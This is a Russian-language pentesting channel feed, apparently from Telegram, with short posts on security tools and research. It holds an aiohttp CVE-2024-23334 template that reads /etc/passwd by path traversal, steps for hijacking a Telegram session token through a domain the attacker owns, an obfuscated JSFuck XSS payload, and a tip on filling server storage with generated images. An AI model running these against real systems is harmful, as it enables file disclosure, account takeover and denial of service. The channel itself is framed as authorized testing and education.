🐈 Не так давно был проект по incident response. И как обычно сроки = "надо было ещё 2 дня назад". Надо было разбирать 50 гб логов. Да, кто-то скажет, что это ещё мало. Но когда первый раз такой проект, а ты вообще пентестер, задача специфичная. Жаль, что только сейчас, но всё же нашёл удобный инструмент для анализа логов.
#red_team

Важной фичей является не только цветной вывод, что упрощает визуальный просмотр логов. Но он ещё парсит и сразу размечает, что это была за атака, к примеру перебор директорий, краулеры, веб атаки (не различает конкретно XSS, SQLi), но по контексту и запросу легко можно понять, что за атака.

➡️ Утилита teler

Использование:

cat /var/log/nginx/access.log | teler

или

teler -i /var/log/nginx/access.log

Разницы в использовании нет, но думаю на чересчур большом логе, чтение из самого teler будет производительнее

📌 Но по сути это не инструмент для парсинга логов, это IDS (Intrusion Detection System).
➡️ Также от этих же разработчиков есть подобие WAF - teler-waf.

Утилиты написаны на 👣

🌚 @poxek

🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓
#CVE #python #red_team

Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

❤️ Шаблон для nuclei

id: "aiohttp"

info:
  name: aiohttp LFI
  author: crth0
  severity: high
  description: CVE-2024-23334 Check LFI.
  reference:
    - https://github.com/jhonnybonny
  classification:
  tags: aiohttp,LFI,CVE-2024-23334


http:
  - method: GET
    path:
      - '{{BaseURL}}/static/../etc/passwd'
      - '{{BaseURL}}/static/../../etc/passwd'
      - '{{BaseURL}}/static/../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../../etc/passwd'
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
        condition: and

по сути даже шаблона не нужно, тут обычный path traversal

🔓 Читать далее

❤️ PoC

🌚 @poxek

🔓 Code 27. Пентестим сети с наименьшим ущербом 🔓
#сети #red_team

MITM — это самая импак­тная ата­ка, которую мож­но про­вес­ти в сети. Но одновре­мен­но это и самая опас­ная тех­ника с точ­ки зре­ния рис­ков для инфраструк­туры. В этой статье Магама рас­ска­жет о том, как спу­фить при пен­тесте, что­бы ничего не сло­мать по дороге и не устро­ить DoS.

Нач­нем с теории. Магама показал, какие парамет­ры нуж­ны для кор­рек­тно­го про­веде­ния MITM. Эти нас­трой­ки поз­волят вам избе­жать неп­редна­мерен­ного DoS.

🔓 Читать далее

🌚 @poxek

☁️ Список ресурсов для обучения/практики пентеста облаков
#cloud #red_team #lab #cheatsheet

Поиск данный репы вдохновлен тем, что по работе был проект, где заказчик использовал Azure в качестве инфраструктуры и множество сервисов на AWS. По сути в РФ уже такое не встретишь, хоть в своё время изучал AWS и учился разворачивать различные бакеты, но уже подзабылось за ненадобностью

👍 В этом репозитории сможете найти cheatsheet'ы, различные ресурсы для изучения, инструменты для пентеста, а самое прикольное, это лабы!

А также, данный репозиторий собрал в себе информацию по:
AWS
GCP
Azure
Kubernetes

💻 Github

🎁 Бонус:
Awesome Cloud Security Labs - репозиторий, с подборкой лаб для практики похека cloud провайдеров. Есть как self hosted, так и HTB like.

🌚 @poxek

Атакуем баржи контейнеры 🖼️
#docker #red_team #escape

За последние пару лет Docker стал очень популярным, как в разработке, так и у пентестеров. Поэтому с каждым годов всё больше компаний переносят инфру на него и кубер. Поэтому нашёл для вас неплохую статью про атаки на докер, которая даст вам как минимум минимальное понимание как атаковать контейнеры, когда вы с ними встретитесь)

➡️ Далее

🌚 @poxek

😑 Genzai
#IoT #ИнтернетВещей #red_team

Genzai помогает найти панели управления, связанные с IoT / Интернета вещей, по одной или нескольким целям, а также проверить их на наличие паролей по умолчанию и потенциальных уязвимостей на основе путей и версий.

📊 Features:
⚪️Беспроводной маршрутизатор
⚪️Камера наблюдения
⚪️HMI (человеко-машинный интерфейс)
⚪️Интеллектуальное управление питанием
⚪️Система контроля доступа в здание (СКУД)
⚪️Климатический контроль
⚪️Промышленная автоматизация
⚪️Автоматизация дома
⚪️Система очистки воды

💻 Github

🌚 @poxek

Принёс вам маленькую удобную плюшку
#red_team #fileupload

При проведении пентестов, часто сталкиваемся с тем, что можно попробовать загрузить для проверки функции загрузки файлов или для content spoofing'а. Так вот один юзер тоже задался таким вопросом и таки написал тулзу, которая генерирует картинки без какого специфичного содержания.
А то заказчик может неправильно понять и обидеться на какую-то картинку

А ещё из недавно, нужно было проверить какой максимальный размер может поглотить загрузка файлов. Был архив с NvidiaRTX Chat на 35 гб. Такой большой объем не ел, а допустим на 5 или 15 гб не смог у себя файлы найти, чтобы это были не какие-то важные архивы. Так вот эта утилита может ещё и картинки любого размера генерировать)

Возможно вы и не сделаете file upload bypass, но переполнить хранилище сервера с лёгкостью, если конечно предыдущие картинки не удаляются.

Установка:

pip install git+ssh://git@github.com/sterrasec/dummy.git

лично у меня не получилось её поставить таким способом. Только через гитклон и ручную установку зависимостей забейте, я разобрался))

Использование:

# Самый простой вариант. Текст по умолчанию "dummy file"
dummy test1.jpeg

# Далее можно поиграться с текстом, чтобы заказчик точно понял, что это оставили мы
dummy -t poxek test2.png

# Далее можем поиграться с размером. Но генерация произвольного размера возможна только для png
dummy -t poxek -b 10MB test3.png

Как я писал выше, только при png мы можем свободно менять размер. Тогда какие форматы ещё поддерживаются? jpeg и pdf.

Если получится, то на досуге перепишу эту тулзу, чтобы она точно у всех работала и собиралась. Но идея проекта не безосновательная.

🧩 Github

🌚 @poxek

Secure Coding Cheatsheets
#appsec #dev #devsecops #red_team #blue_team #SSDLC

Статья на тему безопасной разработки. В статье автор разобрал примеры уязвимостей в коде и как их избегать.

Кому полезен материал: appsec'арям, пентестерам, devsecops'ам и разрабам естественно

Также он показывает примеры не на одном языке, а на:
➡️ C#(.Net)
➡️ PHP
➡️ Go
➡️ Python
➡️ Java
➡️ Android Java
➡️ iOS Swift

Полезно почитать всем, по факту он выбрал самые популярные технологически стеки.
Автор разобрал следующие уязвимости:
➡️ Broken Access Control (Небезопасная управление доступом)
➡️ Cryptographic Failures (Криптографические недостатки)
➡️ Injection (Инъекции)
➡️ Insecure Design (Небезопасный дизайн проектирования)
➡️ Security Misconfiguration (Небезопасная настройка чего либо)
➡️ Vulnerable and Outdated Components (Уязвимые и/или не обновленные компоненты)
➡️ Inadequate Supply Chain Security (Уязвимость в цепочке поставок)
➡️ Insecure Authentication/Authorization (Небезопасная аутентификация/авторизация)
➡️ Insufficient Input/Output Validation (Недостаточная фильтрация ввода/вывода)
➡️ Insecure Communication (Небезопасная передача информации)
➡️ Improper Credential Usage (Неправильное хранение учетных данных)
➡️ Inadequate Privacy Controls (Неправильный контроль конфиденциальности)

Каждый найдет для себя что-то)

➡️ Статеечка

🌚 @poxek

На мушке у APT-группировок: kill chain из восьми шагов и котики
#red_team #APT

Авторы собрали информацию о 16 хакерских группировках, атакующих Ближний Восток, другой (а точнее — другая) проанализировал их тактики и техники, результатом этого тандема стало большое исследование. В этой статье авторы расскажут о том, как действуют APT-группировки, с чего начинают атаку и как развивают ее, двигаясь к намеченной цели.

➡️ Читать далее

🌚 @poxek

Крадем чужой телеграм аккаунт за 10 секунд 😎
#telegram #red_team

Ресерч совсем свежий, ему всего 6 дней)
Так что радуйтесь, харкорный контент по вебу возвращается, для тех кто его ждал и дождался.

Давайте попробуем вместе разобраться, как эта атака сработала. Энтрипоинт здесь это авто аутентификации в веб версии телеги при переходе их клиента телеграма (desktop & smart).

При открытии этой ссылки у вас в URL подставляется токен аутентификации в аккаунт.

Далее автор собрала свою версию tdesktop и анализировала код в поисках захаркорженных доменов телеги. И нашли их.

Далее она начала разбирать как формируется ссылку на авто аутентификацию

http://web.​telegram.org/ becomes https://web.​telegram.org/​#tgWebAuthToken=...
https://z.t.me/​pony becomes https://z.t.me/pony​?tgWebAuth=1​#tgWebAuthToken=...
https://k.t.me/​#po=ny becomes https://k.t.me/​?tgWebAuth=1​#po=ny​&tgWebAuthToken=...

И ещё кучу примеров

Все домены, кроме web.telegram.org, как бы созданы для глубоких ссылок t.me. Переход по любому из них без пути приведет вас на домашнюю страницу telegram.org. При переходе по одной из них с совместимым путем, например z.t.me/share?url=lyra.horse, откроется соответствующий клиент с фрагментом хэша, например:
https://web.telegram.org/a/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse

Обычно это делается с помощью HTTP 301 редиректа, но если параметр tgWebAuth установлен и deep link действительна, то вместо этого вы сможете запустить этот забавный javascript:

<html>
<head>
<meta name="robots" content="noindex, nofollow">
<noscript><meta http-equiv="refresh" content="0;url='https://web.telegram.org/a/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse'"></noscript>
<script>
try {
var url = "https:\/\/web.telegram.org\/a\/#?tgaddr=tg%3A%2F%2Fmsg_url%3Furl%3Dlyra.horse";
var hash = location.hash.toString();
if (hash.substr(0, 1) == '#') {
  hash = hash.substr(1);
}
location.replace(hash ? urlAppendHashParams(url, hash) : url);
} catch (e) { location.href=url; }

function urlAppendHashParams(url, addHash) {
  var ind = url.indexOf('#');
  if (ind < 0) {
    return url + '#' + addHash;
  }
  var curHash = url.substr(ind + 1);
  if (curHash.indexOf('=') >= 0 || curHash.indexOf('?') >= 0) {
    return url + '&' + addHash;
  }
  if (curHash.length > 0) {
    return url + '?' + addHash;
  }
  return url + addHash;
}
</script>
</head>
</html>

Малоизвестный факт, что legacy версия веб клиента telegram всё ещё доступна по адресу: web.telegram.org/?legacy=1. Более того, сессия разделяется между веб-клиентами, поэтому эксплойт в старом веб-клиенте может быть полезен, даже если цель использует современный веб-клиент.

Как итог, автор не смогла найти ничего интересного в WebK, но и WebZ, и старый клиент дали несколько многообещающих зацепок в работе с tgaddr в URL. Однако это оказалось тупиком для её исследования, поскольку я не смог найти способ избавиться от амперсанда в части URL &tgWebAuthToken=... или обойти его. Я даже возился с юникодом, чтобы посмотреть, не позволит ли он мне каким-то образом "стереть" амперсанд, но, похоже, UTF-8 был разработан так, чтобы противостоять этому.

Аналогичный ресерч был проведен и для iOS & Android, но те или иные техники уже не сработают на актуальных версиях приложения и/или ОСи.

Так и что? Нет эксплойта?

По сути да, эксплойта нет. Но автор смогла упростить атаку при физическом воздействии до возможного минимума затрат времени - менее 10 секунд.

➡️Для начала отправьте "z.t.me" в приложении Telegram и нажмите на ссылку.
➡️Это перенаправит их браузер на telegram.org/#tgWebAuthToken=
➡️Отсюда мы изменим домен в браузере на telegramz.org - домен, которым владеет автор, - и нажимаете Enter.
➡️JS на моем домене будет работать дальше, регистрируя одно из устройств автора с помощью токена.

Да, это атака реализуется только при физическом доступе к устройству, к сожалению, но всё равно это впечатляющий результат и я думаю эта атака будет полезна тем ребятам, кто занимается физическим пентестом.

➡️ Если вы что-то не поняли из моего вольного перевода, то здесь сможете найти оригинал статьи

🌚 @poxek

🖥 JSFuck ()+ []!
#js #xss #red_team

JSFuck - это эзотерический и образовательный стиль программирования, основанный на атомарных частях JavaScript. В нем используется всего 6 различных символов для написания и выполнения кода.

Он не зависит от браузера, поэтому его можно запускать даже на Node.js.

Как пример, нагрузка alert(1) будет преобразована в

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])

и опять же, оно будет работать в любом браузере и даже в nodejs)

на сайте представлена базовые символы и их "шифрованный варивант":

false       =>  ![]
true        =>  !![]
undefined   =>  [][[]]
NaN         =>  +[![]]
0           =>  +[]
1           =>  +!+[]
2           =>  !+[]+!+[]
10          =>  [+!+[]]+[+[]]
Array       =>  []
Number      =>  +[]
String      =>  []+[]
Boolean     =>  ![]
Function    =>  []["filter"]
eval        =>  []["filter"]["constructor"]( CODE )()
window      =>  []["filter"]["constructor"]("return this")()

ещё больше вариантов можно посмотреть здесь ТЫК

Если интересно почитать про то, как это работает, то вам сюда ТЫК

🧩 Github

🖥 Демо

🌚 @poxek

Раскрываем секретные функции: магия макросов в Burp Suite
#burpsuite #red_team

Привет! Если ты думаешь, что знаешь всё о Burp Suite, я тебя удивлю! Этот мощный инструмент для тестирования веб-приложений скрывает в себе ещё больше возможностей, способных значительно упростить и ускорить работу. Сегодня мы изучим функционал макросов на практике и увидим, как они могут стать надежным помощником в процессе тестирования и анализа веб-приложений.

Эта статья мне напомнила мне один из докладов на Bugs Zone (багхантерская приватка от BI.ZONE), там был схожий по смыслу доклад. Поэтому решил поделиться этой статьёй с теми, кто ещё не знает про макросы в нашем любимом Бурпсуютике.

🐭 Как итог статьи, автор наглядно показал, как можно сделать четыре действия в одно действие)

📌 Читать статью

🌚 @poxek

❌ PingCastle Notify ✅
#red_team #AD #windows

Я думаю все кто занимались пентестом инфры AD дольше 1 дня знакомы с PingCastle. Классная тулза, которая может проверять AD на мисконфиги и уязвимости. В ней удобно очень много чего. Она умеет как в обычный health check безопасности AD, до чуть ли не готовой презентации для руководства.

Недавно заходила речь о построении CVM (continuous vuln management) внутрянки. И я задавался вопросом, а как его сделать. Поставить тупо nuclei во внутренний контур мало, а какой-то ещё удобной автоматизации нет, шоб с отчётиками красивыми и/или понятными. Так вот нашёл для вас удобную автоматизацию, тем более с интеграцией в Teams/Slack(им кто-то ещё пользуется?).

Это небольшой powershell скрипт, который будет мониторить изменения в отчётах, к примеру pingcastle нашёл новую вулну, вам прилетит уведомление, что-то пропатчили, вам опять же придёт уведомление. Удобно? Очень!

Подготовка:
➡️Скачиваете последнюю версию с сайта.
➡️Разархивируете
➡️Создаете папку Reports внутри PingCastle
➡️Кладёте скрипт PingCastle-Notify.ps1 в корень PingCastle

Далее потребуется настроить уведомления, следовательно создать бота ТЫК

Наконец создать повторяющийся таск в AD ТЫК

По сути всё, мы собрали бюджетный CVM AD на коленки.

🌚 @poxek

Обзор инструментов для оценки безопасности кластера Kubernetes: kube-bench и kube-hunter
#red_team #k8s

Популярность Kubernetes растет, порог входа снижается, но вопросам безопасности порой оказывают недостаточное внимание. В этой статье разберём работу двух Open Source-утилит для аудита безопасности кластера.

➡️ kube-bench
kube-bench — приложение на Go, которое проверяет, соответствует ли кластер Kubernetes рекомендациям CIS Kubernetes Benchmark. Проект имеет богатую историю (появился на GitHub еще в 2017-м году) и явный спрос у сообщества (почти 4000 звёзд).

Что за CIS (Center for Internet Security)? Это некоммерческая организация, которая занимается вопросами кибербезопасности, основываясь на обратной связи от сообщества. CIS Benchmark, в свою очередь, — это сформулированный список рекомендаций по настройке окружения для защиты от кибератак. Данные рекомендации включают в себя поиск слишком широких прав доступа к файлам конфигурации и небезопасных параметров компонентов кластера, незащищенных учётных записей, проверку сетевых и общих политик.

➡️ kube-hunter
Инструмент kube-hunter написан на Python и также предназначен для поиска уязвимостей в кластере Kubernetes. От предыдущей утилиты отличается тем, что нацелен на оценку защиты кластера с точки зрения «атакующего». Тоже имеет достаточно богатую историю: развивается с 2018 года и получил 3000+ звёзд на GitHub.

Ранее Агентство по национальной безопасности и Агентство по кибербезопасности и защите инфраструктуры США опубликовали совместный отчет — «Руководство по усилению безопасности Kubernetes» (Kubernetes Hardening Guidance).

Это событие получило большой интерес со стороны Kubernetes-сообщества. Вплоть до того, что уже стал доступен первый инструмент для проверки K8s-инсталляций на соответствие требованиям, описанным в этом документе. Он называется Kubescape.

➡️ Читать полностью

🌚 @poxek

<Cookie> ctrl+c ctrl+v: автоматизируем прохождение авторизации в DAST
#red_team #appsec #devsecops

Представьте: на дворе 2024 год, вы работаете AppSec-специалистом в российской компании и решаете приобрести готовый сканер DAST, который запускается одной кнопкой. Идет импортозамещение в IT-отрасли, отечественные вендоры создали несколько решений на замену зарубежным. Самые популярные – Solar appScreener, Positive Technologies Black Box и SolidWall DAST. Все они включают опцию прохождения аутентификации по форме на странице.

И тут возникает проблема: у вас SSO или другая user-friendly многостраничная авторизация. А в настройках страница обязательно должна содержать два поля для ввода логина и пароля и одну кнопку. Конечно, можно просто подставить валидные cookie или токен, но тогда готовое решение каждый раз будет просить вас повторно пройти аутентификацию и обновить необходимую информацию для доступа. Согласитесь, выглядит как отличная задача для стажеров вашего отдела.

Статья очень актуальная, свежая и я думаю не только для меня наболевшая тема. Поэтому приятного и полезного прочтения)
➡️ Читать далее

🌚 @poxek